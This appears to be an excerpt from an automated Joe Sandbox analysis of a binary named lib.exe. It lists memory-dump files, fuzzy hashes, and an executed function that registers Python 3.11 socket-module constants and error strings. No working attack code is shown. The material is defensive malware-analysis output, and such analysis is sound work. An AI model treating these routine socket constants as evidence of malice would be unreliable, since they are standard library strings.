Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 231bdef7d4e4c9a314d514652501e8a1bb3d1d6653b2e53c967e9d93a887682d
Instruction ID: 836b9f914563a62e45f7578329e4b428c19935c954d3484b74206964cd444be3
Opcode Fuzzy Hash: 231bdef7d4e4c9a314d514652501e8a1bb3d1d6653b2e53c967e9d93a887682d
Instruction Fuzzy Hash: BF014F61A1C68286FB20BF60D46227EA3B0EFC9748FC8103AD54D86695DF3CE585CB35

Analysis Process: lib.exePID: 5808, Parent PID: 6600COMMON

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	776
Total number of Limit Nodes:	18

Executed Functions

Function 00007FF8B8F81060 Relevance: 632.7, APIs: 189, Strings: 172, Instructions: 923
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 00007FF8B8F810A2
Py_AtExit.PYTHON311 ref: 00007FF8B8F810B7
VerSetConditionMask.KERNEL32 ref: 00007FF8B8F81102
VerSetConditionMask.KERNEL32 ref: 00007FF8B8F81111
VerSetConditionMask.KERNEL32 ref: 00007FF8B8F81121
VerifyVersionInfoW.KERNEL32 ref: 00007FF8B8F81145
PyModule_Create2.PYTHON311 ref: 00007FF8B8F81173
PyModule_AddObject.PYTHON311 ref: 00007FF8B8F8119F
PyErr_NewException.PYTHON311 ref: 00007FF8B8F811B9
PyModule_AddObject.PYTHON311 ref: 00007FF8B8F811DF
PyErr_NewException.PYTHON311 ref: 00007FF8B8F811F9
PyModule_AddObject.PYTHON311 ref: 00007FF8B8F8121F
PyModule_AddObjectRef.PYTHON311 ref: 00007FF8B8F81239
PyModule_AddObject.PYTHON311 ref: 00007FF8B8F8125A
PyModule_AddObject.PYTHON311 ref: 00007FF8B8F8127C
PyModule_AddObject.PYTHON311 ref: 00007FF8B8F8129E
PyMem_Malloc.PYTHON311 ref: 00007FF8B8F812A9
PyCapsule_New.PYTHON311 ref: 00007FF8B8F812F8
PyModule_AddObject.PYTHON311 ref: 00007FF8B8F81317
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81332
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81348
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F8135E
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81374
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F8138A
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F813A0
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F813B6
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F813CC
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F813E2
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F813F8
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F8140E
PyModule_AddStringConstant.PYTHON311 ref: 00007FF8B8F81425
PyModule_AddStringConstant.PYTHON311 ref: 00007FF8B8F8143C
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F8144F
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81465
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F8147B
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81491
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F814A7
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F814BA
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F814D0
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F814E6
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F814FC
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81512
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81528
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F8153E
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81554
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F8156A
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81580
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81596
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F815AC
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F815C2
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F815D8
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F815EE
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81604
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F8161A
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81630
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81646
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81659
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F8166F
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81685
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F8169B
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F816B1
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F816C7
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F816DD
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F816F3
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81709
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F8171F
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81735
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F8174B
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81761
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81774
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81787
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F8179A
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F817B0
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F817C6
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F817DC
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F817F2
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81808
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F8181E
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81834
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F8184A
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81860
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81876
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F8188C
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F818A2
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F818B8
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F818CE
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F818E4
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F818FA
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81910
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81926
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F8193C
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81952
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81968
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F8197E
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81994
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F819AA
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F819C0
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F819D6
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F819EC
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81A02
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81A18
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81A2E
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81A44
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81A57
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81A6D
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81A83
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81A99
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81AAF
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81AC5
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81ADB
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81AEE
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81B04
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81B1A
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81B30
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81B46
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81B5C
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81B72
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81B88
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81B9E
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81BB4
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81BCA
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81BE0
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81BF6
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81C0C
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81C22
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81C38
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81C4E
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81C64
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81C7A
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81C90
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81CA6
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81CB9
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81CCF
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81CE5
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81CFB
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81D11
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81D27
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81D3A
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81D50
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81D66
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81D7C
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81D92
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81DA8
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81DBE
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81DD4
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81DEA
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81E00
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81E16
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81E2C
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81E42
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81E58
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81E6E
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81E81
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81E97
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81EAD
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81EC3
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81ED9
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81EEF
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81F05
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81F1B
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81F31
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81F44
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81F5A
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81F70
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81F86
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81F9C
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81FAF
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81FC2
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F81FD8
PyLong_FromUnsignedLong.PYTHON311 ref: 00007FF8B8F82039
PyModule_AddObject.PYTHON311 ref: 00007FF8B8F82051
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F82073
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F82086
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F8209C
PyModule_AddIntConstant.PYTHON311 ref: 00007FF8B8F820B2
PyModule_GetDict.PYTHON311 ref: 00007FF8B8F820BB
VerSetConditionMask.KERNEL32 ref: 00007FF8B8F82117
VerSetConditionMask.KERNEL32 ref: 00007FF8B8F82126
VerSetConditionMask.KERNEL32 ref: 00007FF8B8F82137
VerifyVersionInfoA.KERNEL32 ref: 00007FF8B8F8215D
PyErr_Format.PYTHON311 ref: 00007FF8B8F83130

Strings

SO_BROADCAST, xrefs: 00007FF8B8F81534
IPPROTO_HOPOPTS, xrefs: 00007FF8B8F8177D
IPV6_JOIN_GROUP, xrefs: 00007FF8B8F81BD6
IPV6_PKTINFO, xrefs: 00007FF8B8F81CC5
AI_V4MAPPED, xrefs: 00007FF8B8F81EFB
SOCK_DGRAM, xrefs: 00007FF8B8F8145B
socket, xrefs: 00007FF8B8F8126F
SO_EXCLUSIVEADDRUSE, xrefs: 00007FF8B8F814F2
EAI_FAMILY, xrefs: 00007FF8B8F81DF6
00:00:00:00:00:00, xrefs: 00007FF8B8F81414
SOCK_STREAM, xrefs: 00007FF8B8F81445
INADDR_ANY, xrefs: 00007FF8B8F81A4D
SHUT_RD, xrefs: 00007FF8B8F81FA5
SOCK_RAW, xrefs: 00007FF8B8F81471
WSAStartup failed: error code %d, xrefs: 00007FF8B8F83123
IPPROTO_RAW, xrefs: 00007FF8B8F81948
RCVALL_OFF, xrefs: 00007FF8B8F82069
TCP_FASTOPEN, xrefs: 00007FF8B8F81D9E
SO_SNDBUF, xrefs: 00007FF8B8F8158C
EAI_SOCKTYPE, xrefs: 00007FF8B8F81E64
EAI_AGAIN, xrefs: 00007FF8B8F81DB4
NI_NUMERICHOST, xrefs: 00007FF8B8F81F50
IPV6_MULTICAST_HOPS, xrefs: 00007FF8B8F81C02
WSAStartup failed: requested version not supported, xrefs: 00007FF8B8F83145
IPV6_UNICAST_HOPS, xrefs: 00007FF8B8F81C44
NI_NUMERICSERV, xrefs: 00007FF8B8F81F7C
AF_UNSPEC, xrefs: 00007FF8B8F81328
IPPROTO_ICMPV6, xrefs: 00007FF8B8F818DA
NI_NOFQDN, xrefs: 00007FF8B8F81F3A
IPPROTO_IP, xrefs: 00007FF8B8F8176A
NI_DGRAM, xrefs: 00007FF8B8F81F92
EAI_SERVICE, xrefs: 00007FF8B8F81E4E
AF_INET, xrefs: 00007FF8B8F8133E
MSG_CTRUNC, xrefs: 00007FF8B8F816A7
SOL_TCP, xrefs: 00007FF8B8F81741
IP_MULTICAST_TTL, xrefs: 00007FF8B8F81B7E
SO_USELOOPBACK, xrefs: 00007FF8B8F8154A
IPPROTO_ND, xrefs: 00007FF8B8F8186C
has_ipv6, xrefs: 00007FF8B8F81291
MSG_ERRQUEUE, xrefs: 00007FF8B8F816D3
gaierror, xrefs: 00007FF8B8F81212
SO_RCVBUF, xrefs: 00007FF8B8F815A2
SO_DONTROUTE, xrefs: 00007FF8B8F8151E
IPV6_HOPLIMIT, xrefs: 00007FF8B8F81C9C
AF_LINK, xrefs: 00007FF8B8F813AC
IPV6_V6ONLY, xrefs: 00007FF8B8F81C5A
IPPORT_USERRESERVED, xrefs: 00007FF8B8F81A3A
IPPROTO_DSTOPTS, xrefs: 00007FF8B8F81906
IPV6_MULTICAST_IF, xrefs: 00007FF8B8F81C18
EAI_MEMORY, xrefs: 00007FF8B8F81E0C
AI_ADDRCONFIG, xrefs: 00007FF8B8F81EE5
IPPROTO_IGMP, xrefs: 00007FF8B8F817A6
AI_ALL, xrefs: 00007FF8B8F81ECF
timeout, xrefs: 00007FF8B8F8122C
CAPI, xrefs: 00007FF8B8F8130D
SOL_IP, xrefs: 00007FF8B8F8172B
IPV6_CHECKSUM, xrefs: 00007FF8B8F81C70
SOCK_RDM, xrefs: 00007FF8B8F8149D
IPPROTO_RDP, xrefs: 00007FF8B8F819CC
IP_RECVDSTADDR, xrefs: 00007FF8B8F81B52
IPV6_MULTICAST_LOOP, xrefs: 00007FF8B8F81C2E
AI_NUMERICHOST, xrefs: 00007FF8B8F81EA3
MSG_DONTROUTE, xrefs: 00007FF8B8F8167B
MSG_BCAST, xrefs: 00007FF8B8F816E9
IPPROTO_ST, xrefs: 00007FF8B8F8198A
MSG_WAITALL, xrefs: 00007FF8B8F816BD
SHUT_WR, xrefs: 00007FF8B8F81FB8
IPV6_TCLASS, xrefs: 00007FF8B8F81D1D
IP_TOS, xrefs: 00007FF8B8F81B10
SO_DEBUG, xrefs: 00007FF8B8F814B0
IP_MULTICAST_IF, xrefs: 00007FF8B8F81B68
SO_TYPE, xrefs: 00007FF8B8F81626
MSG_MCAST, xrefs: 00007FF8B8F816FF
IPPROTO_EGP, xrefs: 00007FF8B8F81814
TCP_KEEPINTVL, xrefs: 00007FF8B8F81D72
00:00:00:FF:FF:FF, xrefs: 00007FF8B8F8142B
IPPROTO_AH, xrefs: 00007FF8B8F818C4
INADDR_MAX_LOCAL_GROUP, xrefs: 00007FF8B8F81ABB
SocketType, xrefs: 00007FF8B8F81250
IPV6_RTHDR, xrefs: 00007FF8B8F81D07
IPV6_HOPOPTS, xrefs: 00007FF8B8F81CAF
RCVALL_SOCKETLEVELONLY, xrefs: 00007FF8B8F82092
IP_DROP_MEMBERSHIP, xrefs: 00007FF8B8F81BC0
SIO_RCVALL, xrefs: 00007FF8B8F81FDE
SO_RCVLOWAT, xrefs: 00007FF8B8F815CE
BDADDR_LOCAL, xrefs: 00007FF8B8F81435
SO_ACCEPTCONN, xrefs: 00007FF8B8F814C6
IPPROTO_PUP, xrefs: 00007FF8B8F8182A
IPPORT_RESERVED, xrefs: 00007FF8B8F81A24
AI_PASSIVE, xrefs: 00007FF8B8F81E77
socket.gaierror, xrefs: 00007FF8B8F811EC
IPPROTO_NONE, xrefs: 00007FF8B8F818F0
AI_NUMERICSERV, xrefs: 00007FF8B8F81EB9
IP_OPTIONS, xrefs: 00007FF8B8F81AE4
AF_SNA, xrefs: 00007FF8B8F813C2
TCP_NODELAY, xrefs: 00007FF8B8F81D30
INADDR_BROADCAST, xrefs: 00007FF8B8F81A63
BTPROTO_RFCOMM, xrefs: 00007FF8B8F81404
IPPROTO_PIM, xrefs: 00007FF8B8F8191C
IPPROTO_MAX, xrefs: 00007FF8B8F8195E
SO_SNDLOWAT, xrefs: 00007FF8B8F815B8
SO_RCVTIMEO, xrefs: 00007FF8B8F815FA
MSG_TRUNC, xrefs: 00007FF8B8F81691
IPPROTO_UDP, xrefs: 00007FF8B8F81840
INADDR_LOOPBACK, xrefs: 00007FF8B8F81A79
NI_MAXHOST, xrefs: 00007FF8B8F81F11
SOCK_SEQPACKET, xrefs: 00007FF8B8F81487
NI_NAMEREQD, xrefs: 00007FF8B8F81F66
SO_OOBINLINE, xrefs: 00007FF8B8F81576
EAI_NONAME, xrefs: 00007FF8B8F81E38
IPPROTO_PGM, xrefs: 00007FF8B8F819E2
AF_INET6, xrefs: 00007FF8B8F81380
_socket.CAPI, xrefs: 00007FF8B8F812CC
IPPROTO_ROUTING, xrefs: 00007FF8B8F81882
EAI_BADFLAGS, xrefs: 00007FF8B8F81DCA
IPV6_RECVTCLASS, xrefs: 00007FF8B8F81CF1
MSG_OOB, xrefs: 00007FF8B8F8164F
IPPROTO_IPV6, xrefs: 00007FF8B8F817E8
IP_RECVTOS, xrefs: 00007FF8B8F81B3C
SOL_SOCKET, xrefs: 00007FF8B8F81715
IPPROTO_CBT, xrefs: 00007FF8B8F819A0
IPV6_RECVRTHDR, xrefs: 00007FF8B8F81CDB
INADDR_UNSPEC_GROUP, xrefs: 00007FF8B8F81A8F
MSG_PEEK, xrefs: 00007FF8B8F81665
RCVALL_MAX, xrefs: 00007FF8B8F820A8
IPPROTO_L2TP, xrefs: 00007FF8B8F819F8
AF_DECnet, xrefs: 00007FF8B8F81396
IPPROTO_FRAGMENT, xrefs: 00007FF8B8F81898
SO_REUSEADDR, xrefs: 00007FF8B8F814DC
IPPROTO_GGP, xrefs: 00007FF8B8F817BC
AF_IPX, xrefs: 00007FF8B8F81354
BDADDR_ANY, xrefs: 00007FF8B8F8141E
WSAStartup failed: network not ready, xrefs: 00007FF8B8F8313C
AF_APPLETALK, xrefs: 00007FF8B8F8136A
TCP_KEEPIDLE, xrefs: 00007FF8B8F81D5C
AI_CANONNAME, xrefs: 00007FF8B8F81E8D
socket.herror, xrefs: 00007FF8B8F811AC
IPPROTO_ESP, xrefs: 00007FF8B8F818AE
IPPROTO_IPV4, xrefs: 00007FF8B8F817D2
IP_ADD_MEMBERSHIP, xrefs: 00007FF8B8F81BAA
SIO_KEEPALIVE_VALS, xrefs: 00007FF8B8F81FFD
SOMAXCONN, xrefs: 00007FF8B8F8163C
SO_SNDTIMEO, xrefs: 00007FF8B8F815E4
EAI_FAIL, xrefs: 00007FF8B8F81DE0
IPV6_LEAVE_GROUP, xrefs: 00007FF8B8F81BEC
TCP_KEEPCNT, xrefs: 00007FF8B8F81D88
SO_LINGER, xrefs: 00007FF8B8F81560
INADDR_ALLHOSTS_GROUP, xrefs: 00007FF8B8F81AA5
INADDR_NONE, xrefs: 00007FF8B8F81AD1
RCVALL_ON, xrefs: 00007FF8B8F8207C
EAI_NODATA, xrefs: 00007FF8B8F81E22
IPPROTO_IGP, xrefs: 00007FF8B8F819B6
herror, xrefs: 00007FF8B8F811D2
IP_HDRINCL, xrefs: 00007FF8B8F81AFA
SO_ERROR, xrefs: 00007FF8B8F81610
IPV6_DONTFRAG, xrefs: 00007FF8B8F81C86
IPPROTO_IDP, xrefs: 00007FF8B8F81856
AF_BLUETOOTH, xrefs: 00007FF8B8F813EE
IPPROTO_ICLFXBM, xrefs: 00007FF8B8F81974
IPPROTO_ICMP, xrefs: 00007FF8B8F81790
SO_KEEPALIVE, xrefs: 00007FF8B8F81508
IPPROTO_SCTP, xrefs: 00007FF8B8F81932, 00007FF8B8F81A0E
SOL_UDP, xrefs: 00007FF8B8F81757
NI_MAXSERV, xrefs: 00007FF8B8F81F27
IP_TTL, xrefs: 00007FF8B8F81B26
IP_MULTICAST_LOOP, xrefs: 00007FF8B8F81B94
TCP_MAXSEG, xrefs: 00007FF8B8F81D46
SIO_LOOPBACK_FAST_PATH, xrefs: 00007FF8B8F8201C
AF_IRDA, xrefs: 00007FF8B8F813D8
SHUT_RDWR, xrefs: 00007FF8B8F81FCE
IPPROTO_TCP, xrefs: 00007FF8B8F817FE
error, xrefs: 00007FF8B8F8118C

Memory Dump Source

Source File: 00000007.00000002.2087709938.00007FF8B8F81000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FF8B8F80000, based on PE: true

Associated: 00000007.00000002.2087650117.00007FF8B8F80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000007.00000002.2087738939.00007FF8B8F88000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000007.00000002.2087768763.00007FF8B8F90000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000007.00000002.2087824889.00007FF8B8F92000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b8f80000_lib.jbxd

Similarity

API ID: Module_$Constant$Object$ConditionMask$Err_$ExceptionInfoStringVerifyVersion$Capsule_Create2DictExitFormatFromLongLong_MallocMem_StartupUnsigned
String ID: 00:00:00:00:00:00$00:00:00:FF:FF:FF$AF_APPLETALK$AF_BLUETOOTH$AF_DECnet$AF_INET$AF_INET6$AF_IPX$AF_IRDA$AF_LINK$AF_SNA$AF_UNSPEC$AI_ADDRCONFIG$AI_ALL$AI_CANONNAME$AI_NUMERICHOST$AI_NUMERICSERV$AI_PASSIVE$AI_V4MAPPED$BDADDR_ANY$BDADDR_LOCAL$BTPROTO_RFCOMM$CAPI$EAI_AGAIN$EAI_BADFLAGS$EAI_FAIL$EAI_FAMILY$EAI_MEMORY$EAI_NODATA$EAI_NONAME$EAI_SERVICE$EAI_SOCKTYPE$INADDR_ALLHOSTS_GROUP$INADDR_ANY$INADDR_BROADCAST$INADDR_LOOPBACK$INADDR_MAX_LOCAL_GROUP$INADDR_NONE$INADDR_UNSPEC_GROUP$IPPORT_RESERVED$IPPORT_USERRESERVED$IPPROTO_AH$IPPROTO_CBT$IPPROTO_DSTOPTS$IPPROTO_EGP$IPPROTO_ESP$IPPROTO_FRAGMENT$IPPROTO_GGP$IPPROTO_HOPOPTS$IPPROTO_ICLFXBM$IPPROTO_ICMP$IPPROTO_ICMPV6$IPPROTO_IDP$IPPROTO_IGMP$IPPROTO_IGP$IPPROTO_IP$IPPROTO_IPV4$IPPROTO_IPV6$IPPROTO_L2TP$IPPROTO_MAX$IPPROTO_ND$IPPROTO_NONE$IPPROTO_PGM$IPPROTO_PIM$IPPROTO_PUP$IPPROTO_RAW$IPPROTO_RDP$IPPROTO_ROUTING$IPPROTO_SCTP$IPPROTO_ST$IPPROTO_TCP$IPPROTO_UDP$IPV6_CHECKSUM$IPV6_DONTFRAG$IPV6_HOPLIMIT$IPV6_HOPOPTS$IPV6_JOIN_GROUP$IPV6_LEAVE_GROUP$IPV6_MULTICAST_HOPS$IPV6_MULTICAST_IF$IPV6_MULTICAST_LOOP$IPV6_PKTINFO$IPV6_RECVRTHDR$IPV6_RECVTCLASS$IPV6_RTHDR$IPV6_TCLASS$IPV6_UNICAST_HOPS$IPV6_V6ONLY$IP_ADD_MEMBERSHIP$IP_DROP_MEMBERSHIP$IP_HDRINCL$IP_MULTICAST_IF$IP_MULTICAST_LOOP$IP_MULTICAST_TTL$IP_OPTIONS$IP_RECVDSTADDR$IP_RECVTOS$IP_TOS$IP_TTL$MSG_BCAST$MSG_CTRUNC$MSG_DONTROUTE$MSG_ERRQUEUE$MSG_MCAST$MSG_OOB$MSG_PEEK$MSG_TRUNC$MSG_WAITALL$NI_DGRAM$NI_MAXHOST$NI_MAXSERV$NI_NAMEREQD$NI_NOFQDN$NI_NUMERICHOST$NI_NUMERICSERV$RCVALL_MAX$RCVALL_OFF$RCVALL_ON$RCVALL_SOCKETLEVELONLY$SHUT_RD$SHUT_RDWR$SHUT_WR$SIO_KEEPALIVE_VALS$SIO_LOOPBACK_FAST_PATH$SIO_RCVALL$SOCK_DGRAM$SOCK_RAW$SOCK_RDM$SOCK_SEQPACKET$SOCK_STREAM$SOL_IP$SOL_SOCKET$SOL_TCP$SOL_UDP$SOMAXCONN$SO_ACCEPTCONN$SO_BROADCAST$SO_DEBUG$SO_DONTROUTE$SO_ERROR$SO_EXCLUSIVEADDRUSE$SO_KEEPALIVE$SO_LINGER$SO_OOBINLINE$SO_RCVBUF$SO_RCVLOWAT$SO_RCVTIMEO$SO_REUSEADDR$SO_SNDBUF$SO_SNDLOWAT$SO_SNDTIMEO$SO_TYPE$SO_USELOOPBACK$SocketType$TCP_FASTOPEN$TCP_KEEPCNT$TCP_KEEPIDLE$TCP_KEEPINTVL$TCP_MAXSEG$TCP_NODELAY$WSAStartup failed: error code %d$WSAStartup failed: network not ready$WSAStartup failed: requested version not supported$_socket.CAPI$error$gaierror$has_ipv6$herror$socket$socket.gaierror$socket.herror$timeout
API String ID: 2280847565-1299366327
Opcode ID: de31a07a70c23239d4b04c80589f0f0a269b501d95a9cdd44f27bf4122d5a2ac
Instruction ID: 82c3ee16806cd76376e876881f763aea6a6a623a5d46e839538f4238c70133e8
Opcode Fuzzy Hash: de31a07a70c23239d4b04c80589f0f0a269b501d95a9cdd44f27bf4122d5a2ac
Instruction Fuzzy Hash: C8A2A674B38B12D5EB24DB19EC54A642721BB4ABD2F846035CE0E06766EF7DE14BC708

Function 00007FF759975DEC Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF759975B20: _invalid_parameter_noinfo.LIBCMT ref: 00007FF759975B61
